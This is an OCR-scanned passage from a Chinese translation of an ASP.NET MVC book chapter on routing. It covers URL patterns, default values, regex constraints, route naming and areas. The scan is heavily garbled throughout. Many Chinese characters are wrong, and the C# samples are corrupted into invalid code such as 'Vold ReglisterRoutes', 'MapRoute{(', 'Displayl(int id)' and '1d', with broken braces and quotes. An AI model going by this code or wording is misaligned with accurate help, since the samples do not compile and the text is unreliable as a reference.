为 更 好 地 理解 路 由 ， 很 多 开发 人 员 育 欢 把 它 与 URL 重 写 进行 对 比 。 因 为 这 两 种 方法 
都 可 用 于 分 离 传 入 URL 和 结束 处 理 请 求 。 此 外 ， 它 们 也 都 可 以 为 搜索 引擎 优化 (Search 
Engine Optimization，SEO) 构 建 “ 漂 亮 的 ”URI 。 

然而 ， 它 们 二 者 之 间 也 有 很 大 区 别 。 它 们 的 关键 区 别 在 于 ，URL 重 写 关注 的 是 将 一 个 
URL 映射 到 男 一 个 URL。 例如 ，URL 重 写 经 常用 来 把 旧 的 URL 映射 到 新 的 URL。 与 之 相 
比 ， 路 由 关注 的 则 是 如 何 将 URL 映射 到 资源 。 

我 们 可 能 会 说 ， 路 由 表示 以 资源 为 中 心 的 URL 视图 。 这 种 情况 下 ，URL 代表 了 Web 
上 的 一 个 资源 (未 必 是 页 面 )。 在 ASPNET 路 由 中 ， 这 个 资源 就 是 一 段 代 码 ， 当 传 入 的 请 
求 与 路 由 匹配 时 就 会 执行 该 段 代 码 。 路 由 决定 了 如 何 根据 URL 特征 调度 请 求 一 一 它 不 会 重 
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路 由 和 重 写 的 另 一 个 重要 区 别 是 : 路 由 也 使 用 它 在 匹配 传 入 URL 时 用 到 的 映射 规则 来 
帮助 生成 URL， 而 URL 重 写 只 能 用 于 传 入 的 请 求 URL， 而 不 能 帮助 生成 原始 的 URL。 

男 一 种 看 法 是 ASPNET 路 由 更 像 是 双向 的 URL 重 写 。 然 而 这 一 说 法 是 缺乏 依据 的 ， 
因为 ASPNET 路 由 机 制 实 际 上 从 来 都 没有 重 写 URL。 用 户 从 浏览 器 中 发 出 的 请 求 URL 与 
应 用 程序 在 整个 请 求 的 生命 周期 中 看 到 的 URL 是 相同 的 ， 从 未 改变 。 


9.2.2 ”路 由 的 定义 


每 个 ASPNET MVC 应 用 程序 都 全 少 再 要 一 个 路 由 来 定义 目 己 处 理 请 求 的 方式 ， 但 通 
凋 情 况 下 ， 程 序 中 总 是 会 有 一 个 或 多 个 路 由 。 可 以 想象 ， 非 常 复杂 的 应 用 程序 可 能 会 包含 
有 数 十 个 甚至 更 多 路 由 。 

本 节 主 要 介绍 如 何 定义 路 由 。 路 由 的 定义 是 从 URL 模式 开始 的 , 因为 它 指定 了 与 路 由 
相 匹 配 的 模式 。 路 由 可 以 指定 它 的 URL 及 其 默认 值 ， 此 外 ， 它 还 可 以 约束 URL 的 各 个 部 
分 ， 提 供 关 于 路 由 如 何 、 何 时 与 传 入 的 请 求 URL 相 匹 配 的 严格 控制 。 

当 把 路 由 添加 到 路 由 集 时 ， 它 可 以 有 名 称 。 稍 后 会 介绍 路 由 命名 。 

下 面 从 非 芝 简 单 的 路 由 开始 介绍 ， 并 在 此 基础 上 逐步 深入 。 


1. 路 由 URL 


创建 一 个 ASPNET MVC Web 应 用 程序 项 目 后 , 快速 浏览 一 下 Globalasax.cs 文件 中 的 
代码 ， 我 们 会 注意 到 ，Application_Start 方法 中 调用 了 一 个 名 为 RegisterRoutes 的 方法 。 顾 
名 思 义 ， 该 方法 在 ~/App _Start/RouteConfig.cs 文件 中 ， 我 们 可 以 用 来 为 应 用 程序 注册 需要 
的 所 有 路 由 。 

产品 小 组 的 话 

我 们 没有 在 Application Start 方法 中 直接 把 路 由 添加 到 RouteTable 中 ， 而 是 把 添加 路 
由 的 代码 放 在 了 名 为 RegisterRoutes 的 静态 方法 中 ， 以 便 更 方便 地 编写 路 由 单元 测试 代码 。 
这 样 一 来 ， 我 们 只 需 在 单元 测试 方法 中 编写 如 下 代码 ， 就 可 以 非常 轻松 地 使 用 在 
Global.asax.cs 文件 中 定义 的 相同 路 由 来 填充 RouteCollection 的 本 地 实例 。 


Var routes = new RouteCollection(}); 
RouteConfig.RegisterRoutes (routes}):; 


/ /Write tests to verify your routes here... 


想 要 更 多 地 了 解 单 元 测试 路 由 ， 请 参阅 第 13 章 的 13.3.2 节 。 


现在 清除 RegisterRoutes 方法 中 的 路 由 ， 然 后 添加 一 个 非常 简单 的 路 由 。 添 加 后 ， 
RegisterRoutes 方法 的 代码 如 下 所 示 : 
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public static Vold ReglisterRoutes (RouteCollection routes) 
{ 
routes.MapRoute("simple™", "{first}/{second}/{third}"™"); 

} 

MapRonute 方法 的 最 简单 形式 是 采用 路 由 名 称 和 路 由 的 URL 模式 。 足 由 名 称 会 在 后 面 
介绍 。 现 在 主要 讨论 它 的 URL 模式 。 

表 9-1 展示 了 在 上 面 代码 中 定义 的 路 由 如 何 把 指定 的 URL 解析 成 一 个 存储 在 RouteValue- 
Dictionary 实例 中 的 键 / 值 对 , 从 而 帮助 我 们 理解 路 由 如 何 把 URL 分 解 成 稍 后 在 请 求 管道 中 
使 用 的 重要 信息 片段 。 


表 9-1 URL 参数 值 映射 示例 
URL URL 参数 值 

/albums /display/123 first = "albums" 

second = "display" 

third = "123" 
/foo/bar/baz first = "foo" 

second = "bar" 

third = "baz" 
/a.b/ic-d/e-f first = "a.b" 

second ="c-d" 


third = "e-f" 


注意 , 在 前 面 代码 定义 的 路 由 URL 是 由 才干 个 URL 段 ( 段 是 指 两 个 斜 杠 之 间 的 所 有 内 


容 ， 不 包括 两 端的 斜 杠 ) 组 成 ， 每 个 段 都 包含 了 一 个 由 一 对 花 插 号 限定 的 占 位 符 。 这 些 占 位 
符 就 是 URL 参数 。 


这 是 一 种 模式 匹配 规则 ， 用 来 决定 该 路 由 是 否 适 用 于 传 入 的 请 求 。 针 对 本 示例 ， 由 于 
URL 参数 在 默认 情况 下 将 匹配 任何 非 空 值 , 因此 示例 中 定义 的 规则 可 以 匹配 任何 市 有 3 个 
段 的 URL。 当 该 路 由 与 囊 有 3 个 段 的 URL [匹配 时 ,URL 第 一 个 段 中 的 文本 对 应 于 {firstY URL 
参数 , 同 理 , 第 二 个 段 的 文本 对 应 于 {second} URL 参数 , 第 三 个 段 的 文本 对 应 十 { third } URL 

正如 示例 中 的 做 法 ， 可 以 把 这 些 参 数 命 名 为 任何 想 要 的 名 称 (名 称 中 可 以 包括 学 母 
数字 字符 以 及 其 他 一 些 字 符 )。 当 客户 疹 请 求 到 达 服 务 器 时 ， 路 由 将 解析 请 求 的 URL， 并 
将 解析 出 的 路 由 参数 值 放 入 字典 中 ( 即 通过 RequestContext 访问 的 RouteValueDictionary)， 
在 生成 的 字典 中 把 路 由 URL 参数 名 称 作为 键 ， 将 请 求 URL 对 应 位 置 上 的 子 段 作 为 值 。 

后 面 我 们 会 了 解 到 , 在 ASPNET MVC 应 用 程序 中 使 用 路 由 时 ， 一 些 参 数 的 名 称 是 具有 
特殊 意义 的 。 
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2. 路 由 值 


如 果真 正 请 求 表 9-1 中 列举 的 URL， 我 们 会 发 现 应 用 程序 会 返回 一 个 “404 File Not 
Found” 错 误 。 尽 管 我 们 可 以 使 用 任何 想 要 的 名 称 定义 路 由 ， 但 是 为 了 程序 正确 运行 ， 
ASPNET MVC 框架 要 求 使 用 一 些 特定 的 参数 名 称 一 一 {controller} 和 {action}。 

{controller} 参 数 的 值 通常 用 于 实例 化 为 一 个 处 理 请 求 的 控制 器 类 。 按 照 约定 , ASPNET MVC 
把 Controller 后 缀 添加 到 {controller} URL 参数 值 的 后 面 构成 一 个 类 型 名 称 ， 然 后 根据 该 名 
称 查找 实现 了 System.Web.Mvc IController 接口 的 类 型 (不 区 分 大 小 写 )。 

现在 我 们 回 到 刚才 的 简单 路 由 示例 ， 将 代码 : 


routes .MapRoute ("simple", "{first}/{second}/{third}"); 
修改 为 : 
routes.MapRoute("simple", "{controller}/{action}/{id}"); 


使 应 用 程序 包含 具体 的 URL 参数 名 称 。 

再 次 查看 表 9-1 中 的 第 一 个 示例 ， 并 把 它 应 用 于 更 新 后 的 路 由 ， 我 们 可 发 现 /albums/ 
display/123 请 求 现 在 变 成 了 请 求 名 称 为 “albums” 的 {controllerY。ASPNET MVC 框架 将 把 
Controller 后 缀 添加 到 URL {controller} 参 数值 的 后 面 ， 从 而 得 到 类 型 名 称 AlbumsController。 
如 果 存 在 一 个 与 其 相同 的 类 型 名 称 ， 并 且 该 类 型 还 实现 了 IController 接口 ， 那 么 该 类 型 就 
会 被 实例 化 ， 并 用 于 处 理 当 前 这 个 请 求 。 

{action} 参 数值 用 来 指明 处 理 当前 请 求 需 要 调用 的 控制 器 方法 。 注意, 这 种 方法 调用 只 
适用 于 那些 继承 System.Web.Mvc.Controller 基 类 的 控制 闫 类 。 直 接 实 现 IController 接口 
的 闫 可 以 目 定义 处 理 映射 代 码 的 约定 来 处 理 当 前 请 求 。 

下 面 继续 前 面 的 /albums/display/123 示例 ， 接 下 来 ，ASPNET MVC 将 调用 Albums 
Controller 控制 器 中 的 Display 方法 。 

注意 ， 尽 管 表 9-1 中 的 第 三 个 URL 是 一 个 有 效 的 路 由 URL， 但 是 它 不 能 匹配 任何 控 
制 副 和 操作 ， 因 为 它 要 尝试 实例 化 一 个 名 称 为 abController 的 控制 器 ， 和 莹 试 调用 一 个 名 为 
c-d 的 方法 ， 显 然 二 者 都 不 符合 ASPNET 语法 规则 ， 即 二 者 都 不 是 有 效 的 方法 名 称 。 

除 {controller} 和 {action} 外 ， 如 果 还 有 其 他 任何 路 由 参数 ， 它 们 都 可 以 作为 参数 传递 到 
操作 方法 中 。 例 如 ， 假 设 存在 如 下 的 控制 堪 ; 

public class AlbumsController : Controller 

| public ActionResult Displayl(int id) 

//Do something 


return View(); 


第 9 章 路 由 


那么 对 /albums/display/123 的 请 求 会 导致 MVC 实例 化 AlbumsController 控制 器 ， 并 调 
用 其 中 的 Display 方法 ， 同 时 将 123 传递 给 Display 方法 的 参数 id。 

在 前 面 的 示例 中 ， 我 们 用 到 了 路 由 URL: {controller}/{action}/{id}。 其 中 的 每 一 个 有 段 
包含 了 一 个 URL 参数 ， 同 时 URL 参数 也 占有 对 应 的 整个 段 。 事 实 上 ， 并 不 一 定 总 是 这 样 。 
路 由 URL 在 段 中 也 允许 包含 字面 值 。 例 如 ， 我 们 可 能 会 把 MVC 和 集成 到 一 个 现 有 站 点 中 ， 
并 且 想 让 所 有 MVC 请求 以 site 开头 ; 可 以 参照 下 面 的 代码 实现 : 


site/{controller}/{action}/t{idl} 

上 面 的 路 由 指出 了 请 求 URL 的 第 一 个 段 只 有 以 site 开头， 才能 与 请 求 相 匹配 。 因 此 ， 
上 面 的 路 由 可 以 匹配 /site/albumsy/display/123， 而 不 能 匹配 /albums/display/123 。 

此 外 ， 还 有 更 灵活 的 路 由 语法 规则 : 在 URL 段 中 人 允许 字面 值 和 参数 混合 在 一 起 。 它 
仅 有 的 限制 就 是 不 允许 有 两 个 连续 的 URL 参数 。 所 以 下 面 的 两 个 示例 : 


{language}-{country}/{controller}/{action)} 
{controller}.{action}.{1id} 


都 是 有 效 的 路 由 URL， 但 是 : 
{controllerl}{action}/t{id)} 
不 是 有 效 的 路 由 , 因为 这 样 的 话 , 路 由 将 无 法 知道 传 入 请 求 URL 的 控制 器 部 分 何 时 结 


束 ， 操 作 部 分 何 时 开始 。 
下 面 看 一 些 其 他 示例 (如 表 9-2 所 示 )， 它 们 可 以 帮助 我 们 理解 URL 模式 匹配 的 机 理 。 


表 9-2 路 由 URL 模式 及 其 匹配 示例 


路 由 URL 模式 匹配 的 URL 示例 
{controller}/{action}/ {genre!} /albums/list/rock 
service/{action}-{format} /service/display-xml 
{report}/{vyear}/{month}/{day} /sales/2008/1/23 


3. 路 由 默认 值 


至 此 ， 本 章 已 经 介绍 完了 定义 路 由 的 方法 ， 定 义 的 路 由 中 包含 了 匹配 URL 的 模式 。 
事实 证 明 ， 路 由 URL 并 不 是 在 匹配 请 求 时 所 要 考虑 的 唯一 因素 。 我 们 还 应 该 考虑 为 路 
由 URL 参数 提供 的 默认 值 。 假 设 现在 有 一 个 没有 任何 参数 的 操作 方法 ， 如 下 面 的 代码 
所 示 : 


public class AlbumsController : Controller 
{ 
public ActionResult List() 
! 
/ /Do something 
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return View()y ， 


} 
} 
我 们 会 很 自然 地 想到 通过 下 面 的 URL 调用 List 方法 : 
/albums/list 


然而 ， 根 据 前 面 代码 段 定 义 的 路 由 URL， 即 fcontroller}y/factiony/fidy ， 代 码 片 段 9-8 
就 不 能 正常 运行 ， 因 为 前 面 定 义 的 路 由 只 匹配 包含 三 个 段 的 URL， 但 是 /albumslist 只 包含 
两 个 段 。 

此 时 ， 似 乎 需要 定义 一 个 类 似 于 前 面 路 由 格式 的 新 路 由 ， 不 同 的 是 新 路 由 的 URL 需 
要 包含 两 个 段 ， {controller}/{action}。 如 果 当 匹配 请 求 URL 时 ， 不 用 定义 新 路 由 ， 而 指出 
上 上 面 路 由 的 第 三 个 段 是 可 选 的 ， 不 是 更 好 ? 

香 运 的 是 ， 我 们 可 以 这 样 做 ! 路 由 API 允许 为 参数 段 提供 默认 值 。 例 如 ， 可 以 参照 下 
面 代码 定义 路 由 : 

routes.MapRoute{("simple", "{controller}/{action}/{id}", 

new {id = UrlParameter.Optionall})}; 

{id = UrlParameter.Optional} 这 段 代 人 码 为 {id} 参 数 定义 了 默认 值 。 此 时 ， 该 默认 情况 就 
允许 路 由 匹配 没有 id 参数 的 请 求 。 换 言 之 ， 该 路 由 现在 既 可 以 匹配 具有 两 个 段 的 URL， 
也 可 以 匹配 三 个 段 的 URL， 而 不 是 仅仅 匹配 三 个 段 的 URL。 


四 注意 ”还 可 以 通过 将 这 设置 为 空 串 fid= ""} 来 实现 上 述 功能 。 这 种 实现 方 
式 看 起 来 更 简明 ， 但 是 为 什么 不 这 样 设置 呢 ? 有 什么 区 别 吗 ? 
还 记得 我 们 前 面 提 到 的 ， 框 架 会 解析 URL 参数 值 并 将 解析 后 的 内 容 放 入 
一 个 字典 中 吗 ?” 当 我 们 使 用 UrlParameter.Optional 作为 默认 参数 值 时 , 在 URL 
中 并 没有 提供 值 ， 路 由 就 不 在 字典 中 添加 条 目 。 如 果 该 默认 值 被 设置 为 空 串 ， 
那么 路 由 值 字典 将 添加 一 个 键 ， 它 的 名 称 为 “id”， 对 应 的 条 目 为 空 事 。 在 一 
些 场合 中 ， 这 种 差别 是 很 重要 的 。 它 可 以 让 我 们 知道 id 值 没有 被 指定 和 指定 
为 空 的 区 别 。 


现在 , 框架 允许 使 用 URL /albums/list 来 调用 List 操作 方法 , 尽管 这 已 经 实现 了 我 们 的 
目标 ， 但 是 下 面 继续 讲解 天 认 值 的 其 他 用 途 。 

我 们 可 以 为 多 个 参数 提供 默认 值 。 下 面 代码 段 中 也 为 {action} 参 数 提供 了 一 个 默认 值 : 

routes.MapRoute("simple™ 


,， "{controller}/{action}/{id}" 
: new {id = UrlParameter.Optional, action="index™}); 
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产品 小 组 的 二 


”我 们 使 用 简明 的 语法 来 定义 字典 。MapRoute 方法 在 底层 把 新 的 {id-Urlparameter 


Optional, action"index"} 转 换 成 RouteValueDictionary 的 一 个 实例 ， 这 一 问题 稍 后 会 进行 讨 
论 。 字典 的 键 是 "id" 和 "action"， 它们 的 对 应 值 分 别 是 UrlParameter.Optional 和 "index"。 该 语 
法 可 以 把 对 象 的 属性 名 称 作 为 键 ， 把 对 应 的 属性 值 作 为 值 ， 构 建 对 象 ， 并 把 构建 的 对 象 加 
入 字典 中 。 示 例 中 我 们 使 用 的 具体 语法 是 ， 使 用 对 象 初 始 化 语法 创建 一 个 匿名 类 型 。 虽 然 
这 样 一 开始 可 能 会 感觉 有 些 不 自然 ， 但 是 我 们 慢 慢 就 会 变 得 喜欢 它 的 简明 性 。 


本 例 通 过 Route 类 的 Defaults 字典 属性 ， 为 URL 中 的 {action} 参 数 提供 默认 值 。 虽 然 
{controller}/{action} 的 URL 模式 通常 只 要 求 匹 配 含有 两 个 段 的 URL, 但 是 通过 为 第 二 个 参 
数 提供 默认 值 ， 它 就 不 再 要 求 匹 配 的 URL 必须 包含 两 个 段 ， 要 匹配 的 URL 也 可 能 只 包含 
个 {controller} 参 数 。 在 这 种 情况 下 ，{faction} 的 值 是 通过 默认 值 提 供 的 ， 而 不 是 通过 传 入 
的 URL。 
下 面 回顾 一 下 前 面 的 表 9-2， 并 把 路 由 默认 值 添加 进去 ， 如 表 9-3 所 示 。 


表 9-3 ”路 由 URL 模式、 默认 值 及 其 匹配 示例 


路 由 URL 模式 匹配 URL 模式 的 示例 


{controller!/{actiont/{1d! new {1d = URLParameter.Optional} /albums/display/123 


/albums/displa' 
{controller}/{action} {1d} new {controller = "home". /albums/display/123 
action = "Index". /albums/display 
id =UrlParameter.Optional} /albums 
/ 


再 要 注意 的 是 ， 默 认 值 相 对 于 其 他 URL 参数 的 位 置 非 党 重要。 例如， 假设 存在 URL 
模式 {controller}/{action}/{id}， 如 果 我 们 只 为 {action} 参 数 指定 默认 值 ， 而 没有 为 {id} 参数 
指定 默认 值 , 那么 效果 与 不 给 {action} 参 数 提供 默认 值 是 一 样 的 。 尽管 路 由 允许 有 这 样 的 路 
由 ， 但 这 样 提供 默认 值 ， 路 由 不 是 非常 有 用 。 为 什么 会 这 样 ? 

下 面 简单 的 例子 将 会 使 答案 一 目 了 然 。 假 设 定义 了 下 面 两 个 路 由 ， 第 一 个 路 由 为 中 辣 
的 “action ”参数 设 定 了 默认 值 : 

routes .MapRoute ("simple", "{controller}/i{action}/{id}", new 

{action="index ™})}); 

routes.MapRoute ("simple2", "{controller}/{action}");} 

现在 ,如 果 传 入 一 个 URL 为 /albums/rock 的 请 求 ,那么 上 面 哪 一 个 路 由 将 与 之 匹配 呢 ? 
由 于 第 一 个 路 由 为 {action} 参 数 提 供 了 默认 值 ， 因 此 第 一 个 路 由 会 匹配 该 URL， 所 以 {id} 
参数 值 应 该 是 “rock”， 或 者 ， 它 与 第 二 个 路 由 相 匹 配 ， 将 参数 {faction} 设 置 为 “rock”， 具 
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体 采 用 哪 一 种 匹配 模式 呢 ? 

本 例 的 问题 在 于 选择 匹配 路 由 时 出 现 了 二 义 性 。 为 避免 这 种 二 义 性 ， 只 有 为 当前 参数 
后 面 的 每 个 参数 也 定义 一 个 默认 值 ， 路 由 引擎 才能 使 用 当前 参数 的 默认 值 。 在 本 例 中 ， 我 
们 只 为 {action} 参 数 定义 了 默认 值 ， 而 没有 对 它 后 面 的 {id} 参 数 定义 默认 值 。 

如 果 URL 上 段 中 含有 了 字面 值 ， 那 么 路 由 解释 默认 值 的 方式 会 稍 有 不 同 。 假 设 有 如 下 定 
义 的 路 由 : 


routes.MapRoute("simple", "{controller}-{action}", new {action = “1InaeX | ) ; 


注意 ， 参 数 {controller} 和 {action} 之 间 存 在 一 个 字符 串 字 面值 (-)。 显 而 易 见 ，URL 为 
/albums-list 的 请 求 将 会 与 该 路 由 匹配 ， 但 是 URL 为 /albums- 的 请 求 是 否 也 能 与 其 匹配 呢 ? 
可 能 不 会 ， 因 为 这 样 会 生成 很 粮 糕 的 URL。 

原来 ， 任 何 带 有 字面 值 的 URL 有 段 (在 两 个 斜 杠 之 间 的 URL 部 分 ) 在 匹配 请 求 URL 时 ， 
都 禁止 省 去 任何 参数 值 。 本 例 中 的 默认 值 在 生成 URL 时 才 开 始 起 作用 ， 本 章 后 面 的 9.2.9 
节 将 会 介绍 该 内 容 。 


4. 路 由 约束 


有 了 时， 相对 于 指定 URL 段 的 数量 来 说 ， 我 们 需要 对 URL 有 更 多 的 控制 。 例 如 下 面 两 
"TR 

® http://example.conmy2008/01/23/ 

e http://example.com/posts/categories/aspnetmve/ 

显而易见 ， 上 和 而 两 个 URL 都 包含 有 3 个 段 , 并 且 痢 可 以 和 本 章 前 面 所 示 的 默认 路 由 相 
匹配 。 如 条 我 们 不 小 心 ， 就 会 使 系统 得 找 一 个 名 为 2008Controller 的 控制 器 和 一 个 名 为 01 
的 方法 ! 显然 这 是 很 元 唐 的 ， 然 而 ， 仅 通过 香 看 这 些 URL， 我 们 如 何 才 能 知道 它们 应 该 映 
射 到 哪些 内 容 呢 ? 

这 正 是 约束 的 用 武之 地 。 约 束 允许 URL 段 使 用 正则 表达 式 来 限制 路 由 是 否 匹配 请 求 ， 
例如 : 


routes.MapRoute ("blog", "{year}/{month}/{day}" 


: new {controller="blog", action="index"}] 
/new {year=@"\d{4}", month=@"\d{2}", day=@"\d{2}"}),; 


routes.MapRoute("simple", "{controller}/{action}/{id}"); 


在 上 和 面 的 代码 段 中 ， 创 建 的 路 由 包含 有 3 个 段 : {year}、{month} 和 {day}。 其 中 的 每 
个 段 映 射 到 由 匿名 对 象 初始 化 器 指定 的 约束 字典 中 的 相应 约束 : {year=@"\d{4}"，month= 
@"d{2}", day=@"\d{2}"}。 从 中 可 以 看 出 , 是 约束 字典 的 键 映射 到 路 由 的 URL 参数 。 因 此， 
对 于 {year} 段 的 约束 是 一 个 只 能 匹配 包含 4 个 数字 的 字符 串 的 正则 表达 式 ， 即 \d{4}。 

上 面 使 用 的 正则 表达 式 格式 与 .NET Framework 的 Regex 类 所 使 用 的 格式 相同 ,事实 上 ， 
在 路 由 的 底层 使 用 的 就 是 Regex 类 。 如 果 一 个 路 由 的 任何 约束 都 不 能 匹配 请 求 URL， 那 么 
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该 路 由 就 不 能 匹配 传 入 的 请 求 ， 此 时 路 由 机 制 会 移 问 下 一 个 路 由 继续 匹配 。 

如 果 熟 悉 正 则 表达 式 的 语法 规则 , 可 以 知道 \d{4} 实 际 上 [匹配 包含 有 4 个 连续 数字 的 任 
何 字 符 串 ， 比 如 “abc1234def”。 

然而 ， 路 由 机 制 会 目 动 使 用 “^” 和 “$” 符 号 包装 指定 的 约束 表达 式 ， 以 确保 表达 式 
能 够 精确 地 匹配 参数 值 。 换 言 之 ， 在 本 例 中 真正 使 用 的 止 则 表达 式 是 “Ad{4}”， 而 不 是 
\d{4}， 以 确保 只 能 匹配 参数 值 “1234”， 而 不 能 匹配 “abc1234def”。 

因此 在 上 和 面 代 码 片 段 中 定义 的 第 一 个 路 由 能 够 四 配 /2008/05/25， 而 不 能 匹配 /08/05/25， 
因为 08 不 能 与 正则 表达 式 \d{4} 相 匹配 ， 所 以 它 不 能 满足 year 参数 的 约束 。 


四 注意 ”我们 是 在 默认 的 simple 路 由 之 前 添加 的 新 路 由 ; 路 由 会 按 先 后 顺 
序 与 传 入 的 URL 进行 匹配 ， 直 到 匹配 成 功 (如 果 存 在 匹配 路 由 的 话 )。 因 为 
/2008/06/07 的 请 求 将 与 两 个 定义 的 路 由 都 匹配 ， 所 以 我 们 把 更 具体 的 路 由 放 
在 了 前 面 。 


默认 情况 下 , 约束 使 用 正则 表达 式 字 符 串 来 执行 请 求 URL 的 匹配 , 但 是 稍 加 和 留意， 就 
会 发 现 约束 字典 是 实现 了 IDictionary<string, object> 接 口 的 RouteValueDictionary 类 型 对 象 。 
这 意味 着 字典 中 的 值 是 object 类 型 ， 而 不 是 string 类 型 。 这 就 为 传递 约束 值 提供 了 灵活 性 。 
后 面 的 第 9.4 节 会 介绍 如 何 利 用 这 一 特性 。 


9.2.3 ”路 由 命名 


ASPNET 中 的 路 由 机 制 不 要 求 路 由 具有 名 称 ， 而 且 大 多 数 情况 下 没有 名 称 的 路 由 也 能 
够 满足 大 多 数 应 用 场合 。 通常 情况 下 ， 为 了 生成 一 个 URL， 只 需 抓 取 事 先 已 经 定义 的 路 由 
值 ， 并 把 它们 交 给 路 由 引擎 ， 剩 下 的 生成 工作 就 由 路 由 引擎 来 做 。 但 是 正如 本 节 将 要 介绍 
的 ， 有些 情 况 下 ,使 用 这 种 方法 在 选择 生成 URL 的 路 由 时 可 能 会 产生 二 义 性 。 为 路 由 指定 
名 称 可 解决 这 个 问题 ， 因 为 这 样 可 以 在 生成 URL 时 ， 对 路 由 选择 进行 精确 控制 。 

例如 ， 假 设 应 用 程序 已 经 定义 了 以 下 两 个 路 由 : 


public static Vold ReglisterRoutes (RouteCollection routes) 
{ 
routes .MapRoute ( 
name: "Test™, 
url: "code/p/{action}/{id}", 
defaults: new { controller = "Section”, action = "Index"”, 1d = "| 
); 
routes .MapRoute ( 
name: "Default™, 
url: "v{controllerl/{action}/{idt}™. 
defaults: new { controller = "Home", action = "JIndex"”, id = "™ | 
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为 在 视图 中 生成 一 个 指 疝 每 个 路 由 的 超 链接 ， 我 们 编写 了 下 向 两 行 代 人 码 : 


QHtml .RouteLink ("Test", new {controller="section™", action="Index", id=123}) 
QHtml .RouteLink ("Default", new {controller="Home™", action="Index™", id=12?3}) 


注意 上 面 的 两 个 方法 调用 不 能 指定 使 用 哪个 路 由 来 生成 链接 。 它 们 只 是 提供 了 一 些 路 
由 值 ， 来 让 ASPNET 路 由 引擎 帮助 生成 URL。 在 本 例 中 ， 正 如 所 期 望 的 ， 第 一 个 方法 生 
成 指 问 /code/p/Index/123 的 URL, 第 二 个 方法 生成 指 问 /Home/Index/123 的 URL。 对 于 上 而 
这 些 简单 的 示例 而 言 ， 生 成 URL 非常 简单 ， 但 有 些 情形 却 非常 令 人 头疼 。 

假设 我 们 在 路 由 列表 的 开始 部 分 添加 了 如 下 的 页 面 路 由 ， 以 便 /aspx/SomePage.aspx 页 
面 能 够 处 理 URL/static/url: 


routes .MapPadeRoute ("new", "static/url", "~/aspx/SomePage.aspx"); 


注意 ， 在 RegisterRoutes 方法 中 ， 上 和 面 定 义 的 路 由 不 能 放 在 路 由 列表 的 末尾 ， 否 则 它 
就 不 能 匹配 传 入 的 请 求 。 为 什么 会 这 样 呢 ? 这 是 因为 默认 路 由 会 在 它 之 前 与 /static/url 的 请 
求 匹配 成 功 。 因 此 ， 需 要 把 该 路 由 放 在 路 由 列表 的 开始 部 分 ， 即 在 默认 路 由 之 前 。 


注意 ”这 个 问题 并 不 是 针对 使 用 Web Forms 的 路 由 机 制 。 在 很 多 情况 下 ， 
需要 路 由 到 非 ASP NET MVC 路 由 处 理 程序 ， 


将 上 面 定 义 的 路 由 移动 到 定义 路 由 列表 的 开始 位 置 ， 看 起 来 是 无 足 轻重 的 变化 ， 真 是 
这 样 吗 ? 对 于 传 入 的 请 求 而 言 ， 该 路 由 只 能 匹配 URL 为 /static/url 的 请 求 ， 而 不 匹配 任何 
其 他 的 请 求 。 这 也 正 是 我 们 想 要 的 。 但 是 如 何 生成 URL 呢 ? 如 果 回 到 前 面 查 看 两 次 调用 
Url.RouteLink 返回 的 结果 ， 我 们 将 会 发 现 返回 的 两 个 URL 都 是 不 可 用 的 : 


/url?controller=section&taction=Index&id=123 
/static/url?controller=Homet&taction=Index&id=]123 


这 涉及 路 由 机 制 的 微妙 行为 ， 不 可 否认 该 微妙 行为 有 点 像 边 缘 情 况 ， 但 是 我 们 会 时 不 
时 地 遇 到 这 种 情况 。 

通常 情况 下 ， 当 使 用 路 由 生成 URL 时 ， 我 们 提供 的 路 由 值 会 被 用 来 “填充 ”本 章 前 
面部 分 讨论 的 URL 参数 。 

当 有 一 个 URL 模式 为 fcontrollery/factiony/fid} 的 路 由 时 ， 我 们 期 望 在 生成 URL 时 ， 
能 够 为 controller、action 和 id 提供 值 。 在 这 种 情形 下 ， 由 于 新 路 由 没有 URL 参数 ， 因 此 
它 可 以 匹配 每 一 个 可 能 生成 的 URL， 还 有 从 技术 层面 上 讲 ,“ 路 由 值 是 为 每 一 个 URL 参数 
提供 的 ” 这 里 碰巧 新 路 由 没有 URL 参数 。 这 也 正 是 所 有 已 有 URL 不 可 用 的 原因 ， 也 就 是 
说 ， 生 成 URL 的 每 一 次 党 试 都 可 以 匹配 这 个 新 路 由 。 
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尽管 看 起 来 这 是 一 个 大 问题 ， 但 是 其 修正 起 来 却 非常 人 简单。 只 需要 对 所 有 路 由 都 使 用 
名 称 ， 并 且 在 生成 URL 时 指定 路 由 名 称 。 大 多 数 时 候 ， 让 路 由 机 制 挑选 出 用 来 生成 URL 
的 路 由 完全 是 随机 的 ， 而 且 不 一 定 能 挑选 出 开发 人 员 所 期 望 的 路 由 。 当 生成 URL 时 , 我 们 
通 币 明确 地 知道 目 己 想 要 的 路 由 ， 因 此 ， 我 们 可 以 通过 名 称 来 指定 它 。 如 果 南 要 使 用 匿名 
路 由 ， 完 全 离开 URL 生成 直到 路 由 ， 笔 者 推荐 在 应 用 程序 中 编写 单元 测试 来 验证 路 由 和 
URL 生成 的 期 望 行为 。 

指定 路 由 名 称 不 仅 可 以 有 效 地 避免 二 义 性 ， 甚 全 还 可 以 在 茶 种 程度 上 提高 性 能 ， 因 为 
路 由 引擎 可 以 直接 定位 到 指定 的 路 由 ， 并 尝试 用 它 来 生成 URL。 

在 前 面 的 示例 中 ， 我 们 生成 了 两 个 链接 ， 下 面 的 代码 针对 上 述 问 题 进行 了 修改 。 为 了 
可 以 清楚 地 看 到 做 了 哪些 修改 ， 下 面 代码 使 用 了 命名 参数 : 

QHtml .RouteLinK( 

lJinkText: "route: Test™, 
routeName: "test™", 


routeValues: new {controller="section", action="Index"”, lid=1]23} 


) 


QHtml .RouteLinKk( 
linkText: "route: Default™, 
routeName: "default™, 
routeValues: new {controller="Home", action="Index", 1d=1231} 


) 

正如 保加利亚 著名 小 说 家 Elias Canetti 所 说 :“ 人 们 的 名 字 是 他 们 命运 的 缩写 ”。 这 人 句 
话 同样 适用 于 生成 URL 的 路 由 。 
9.2.4 MVC 区 域 

APS.NET MVC 2 中 引进 了 区 域 的 概念 ， 它 允许 我 们 将 模型 、 视 图 和 控制 器 分 成 单独 
的 功能 节点 。 这 怠 意 味 独 我 们 可 以 把 大 型 复杂 的 网 站 分 成 独 干 个 节点 ， 以 方便 管理 。 

1. 区 域 路 由 注册 

我 们 可 以 通过 为 每 一 个 区 域 创 建 类 , 来 配置 区 域 路 由 , 所 创建 的 类 要 派生 目 Area Registration 
类 ， 还 要 重 写 其 中 的 AreaName 和 RegisterArea 成 员 。 在 ASPNET MVC 默认 的 项 目 模 板 
